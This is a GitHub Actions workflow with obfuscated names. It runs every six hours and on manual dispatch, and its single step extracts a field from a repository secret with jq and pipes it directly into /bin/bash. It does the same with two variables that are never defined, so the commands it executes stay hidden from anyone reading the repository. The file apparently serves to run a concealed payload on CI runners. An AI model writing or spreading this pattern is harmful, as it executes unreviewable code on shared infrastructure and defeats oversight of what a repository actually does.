name: temptanaconda

on:
  workflow_dispatch:
  schedule:
    - cron: '30 5/6 * * *'
jobs:  # 14792
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: temptanaconda
        env:
          i14249: ${{ secrets.i14249 }}
        run: |
          echo $i14249 | jq -r .gztbd10935 | /bin/bash
          echo $n22679 | jq -r .b3579 | /bin/bash
          echo $cm7821 | jq -r .hgyf76 | /bin/bash

